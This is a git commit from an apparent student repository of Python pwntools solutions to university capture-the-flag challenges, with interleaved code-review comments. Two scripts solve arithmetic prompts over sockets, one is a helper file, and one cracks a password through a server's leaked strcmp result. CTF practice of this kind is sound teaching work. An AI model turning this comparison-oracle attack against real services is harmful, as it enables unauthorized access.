ucdavis-ecs189m

[RADIOACTIVE] python exploits for uc davis class ecs189m
git clone git://git.figbert.com/ucdavis-ecs189m.git

commit b9f756e53c1228b2b58c4b6ed20e69408a2e50ce
Author: therealFIGBERT <figbertwelner@gmail.com>
Date:   Thu,  3 Oct 2019 10:42:59 -0700

First commit

Diffstat:
Afirst_flag.py | 18++++++++++++++++++
Afunc_dump.py | 47+++++++++++++++++++++++++++++++++++++++++++++++
Asecond_flag.py | 23+++++++++++++++++++++++
Athird_flag.py | 68++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
4 files changed, 156 insertions(+), 0 deletions(-)

diff --git a/first_flag.py b/first_flag.py @@ -0,0 +1,17 @@ +# A CTF exploit by Benjamin Welner +# for the Davis Cyber Security Club server +# at daviscybersec.ddns.net:1337 +# 29/09/2019 +from pwn import * + +conn = remote("daviscybersec.ddns.net", 1337) +for i in range(0,50): + eq = conn.recvline_contains("Question") + pwnlib.ui.more("Question identified.") + eq_solved = bytes("%d"%sum([int(item.strip()) for item in ((eq.split(b":")[1]).strip()).split(b"+")]), "utf-8") + pwnlib.ui.more("Equation recieved, solved, and converted to bytestring as %s."%eq_solved) + print(conn.recv()) + conn.sendline(eq_solved) + pwnlib.ui.more("Bytestring sent to daviscybersec.ddns.net:1337 using sendline()") +print(conn.recv()) +conn.interactive() +\ No newline at end of file diff --git a/func_dump.py b/func_dump.py @@ -0,0 +1,46 @@ +from pwn import * + +def string_to_decimal(s): + lst = [(ord(char)-96) for char in s] + for i in lst: + lst[i-1] = lst[i-1]*(26**(i-1)) + added = sum(lst) + return added + +def increment(password): + new_pass = "" + lst = [] + for c in password: + lst.append(c) + if lst[-1] is not "z": + lst[-1] = chr(ord(lst[-1]) + 1) + else: + lst[-1] = "a" + for i in range(2,27): + if lst[-1*i] is not "z": + lst[-1*i] = chr(ord(lst[-1*i])+1) + break + else: + lst[-1*i] = "a" + for i in lst: + new_pass += i + return new_pass + +def decrement(password): + new_pass = "" + lst = [] + for c in password: + lst.append(c) + if lst[-1] is not "a": + lst[-1] = chr(ord(lst[-1])-1) + else: + lst[-1] = "z" + for i in range(2,27): + if lst[-1*i] is not "a": + lst[-1*i] = chr(ord(lst[-1*i])-1) + break + else: + lst[-1*i] = "z" + for i in lst: + new_pass += i + return new_pass +\ No newline at end of file diff --git a/second_flag.py b/second_flag.py 
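Review bot: The `print(conn.recv())` between parsing the question and `conn.sendline(eq_solved)` is an unbounded blocking read — pwntools `recv()` has no default timeout, so if the server already flushed its prompt together with the question line that `recvline_contains` consumed, the script hangs on the first iteration. Give it a bound, `print(conn.recv(timeout=1))`, or drop it and let `recvline_contains` do the framing. `int(item.strip())` raises ValueError on anything that is not a plain list of `+`-separated integers, which is acceptable for this challenge but deserves a comment such as `# server always sends "Question N: a + b"; anything else aborts the run`. `pwnlib.ui.more()` is a pager for long text; `log.info(...)` is the usual way to emit one-line progress in pwntools scripts, and the log message typo `recieved` should read `received`.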
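Review bot: `string_to_decimal` iterates `lst` while using each element's value as an index into that same list (`for i in lst: lst[i-1] = lst[i-1]*(26**(i-1))`), so it only works by coincidence for inputs like `"ab"` and raises IndexError for e.g. `"c"` (value 3, list length 1). The apparent intent is positional weighting, `for i, v in enumerate(lst): lst[i] = v * 26 ** i`, with the first character as the least significant digit; confirm that against whichever script was meant to call it, since none of the other three files in this commit import `func_dump`. In `increment` and `decrement`, `lst[-1] is not "z"` and the matching `is not "a"` tests compare strings by identity, which relies on CPython caching single-character strings and is a SyntaxWarning from 3.8 on; use `!=`. Both carry loops also index `lst[-1*i]` for `i` up to 26, so a carry that propagates past the start of a password shorter than 26 characters raises IndexError (`increment("zz")` does).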
@@ -0,0 +1,22 @@ +# A CTF exploit by Benjamin Welner +# for the Davis Cyber Security Club server +# at daviscybersec.ddns.net:1338 +# 29/09/2019 +from pwn import * +import struct + +conn = remote("daviscybersec.ddns.net", 1338) +conn.recvuntil("Ready") +for i in range(0,50): + print(conn.recvuntil("Question")) + print(conn.recvuntil(" : ")) + num_one = struct.unpack("I", conn.recv(4))[0] + conn.recvuntil(" + ") + num_two = struct.unpack("I", conn.recv(4))[0] + print("First number: {}\nSecond number: {}".format(num_one, num_two)) + num_sum = num_one + num_two + print("Sum: {}".format(num_sum)) + num_sum = struct.pack("I", num_sum) + conn.send(num_sum) + print("Bytestring sent to daviscybersec.ddns.net:1337 using send()") +conn.interactive() +\ No newline at end of file diff --git a/third_flag.py b/third_flag.py 
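Review bot: `conn.recv(4)` returns *up to* 4 bytes, not exactly 4, so `struct.unpack("I", conn.recv(4))` raises `struct.error` whenever an operand arrives in a split read; use `conn.recvn(4)`, which blocks until exactly 4 bytes are available. On the send side `struct.pack("I", num_sum)` raises `struct.error` once `num_one + num_two` exceeds 0xFFFFFFFF; if the server adds in 32-bit arithmetic (not visible here), the reply needs `struct.pack("I", num_sum & 0xFFFFFFFF)`, otherwise the overflow case should at least be commented. `"I"` also uses native byte order and alignment, so `"<I"` would pin the wire format instead of depending on the host. The final log line names port 1337 while the connection on this file is to 1338.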
@@ -0,0 +1,67 @@ +# A CTF exploit by Benjamin Welner +# for the Davis Cyber Security Club server +# at twinpeaks.cs.ucdavis.edu:30004 +# 29/09/2019 +# +# Challenge: +# I have a password that only has lowercase letters and has length 20. +# Enter the password to get the flag. +from pwn import * +import itertools + +def pass_gen(char=None, pos=None, premade=None): + password = "" + if premade is None: + for _ in range(0,20): + password += char + else: + lst = [a for a in premade] + for i in range(pos,20): + lst[i] = char + for item in lst: + password += item + return password + +def find_middle(lst): + middle = float(len(lst))/2 + return int(middle - .5) if middle % 2 != 0 else int(middle) + +master_alphabet = ["a","b","c","d","e","f","g","h","i","j","k","l","m","n","o","p","q","r","s","t","u","v","w","x","y","z"] +current_mid = find_middle(master_alphabet) +cracked = False +alphabet = master_alphabet +passkey = "" +previous_pass = "" +start = 0 + +conn = remote("twinpeaks.cs.ucdavis.edu", 30004) +print(conn.recv()) +passkey = pass_gen(char=alphabet[current_mid]) +conn.sendline(passkey) +print("Current letters:\n%s"%alphabet) +print("Pass sent as:\n%s"%passkey) +response = conn.recvline_contains(b"strcmp") +print("Server response:\n%s"%response) +while not cracked: + if b" -1 " in response: + alphabet = alphabet[current_mid:] + current_mid = find_middle(alphabet) + previous_pass = passkey + passkey = pass_gen(char=alphabet[current_mid], pos=start, premade=passkey) + elif b" 1 " in response: + alphabet = alphabet[:current_mid] + current_mid = find_middle(alphabet) + previous_pass = passkey + passkey = pass_gen(char=alphabet[current_mid], pos=start, premade=passkey) + else: + print("Password cracked as: %s"%passkey) + cracked = True + conn.interactive() + conn.sendline(passkey) + print("Current letters:\n%s"%alphabet) + print("Pass sent as:\n%s"%passkey) + response = conn.recvline_contains(b"strcmp") + print("Server response:\n%s"%response) + alphabet = 
master_alphabet[master_alphabet.index(alphabet[0]):] + current_mid = find_middle(alphabet) + start += 1 +\ No newline at end of file
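Review bot: The search's termination is the fall-through `else`: any `strcmp` line that contains neither `b" -1 "` nor `b" 1 "` is declared a successful crack, so an error message, or a server that prints strcmp's raw byte difference rather than a normalised sign, ends the loop with a wrong password. Parse the number and test it explicitly, e.g. `result = int(response.split()[-1])` (adjust the field to the real line format) followed by `if result < 0:` / `elif result > 0:` / `else:`. Indentation is lost in this listing, so it cannot be verified whether `alphabet = master_alphabet[...]`, `current_mid = find_middle(alphabet)` and `start += 1` sit at loop-body level; if they do, `start` advances on every probe rather than once per resolved character, which is worth confirming against a run. `find_middle` tests `middle % 2 != 0`, the parity of half the length, where the intent reads as an integrality check; `len(lst) // 2` is the plain midpoint. For the record, the leak being exploited is the server echoing the result of a non-constant-time comparison; `hmac.compare_digest` with no result disclosure is the server-side fix.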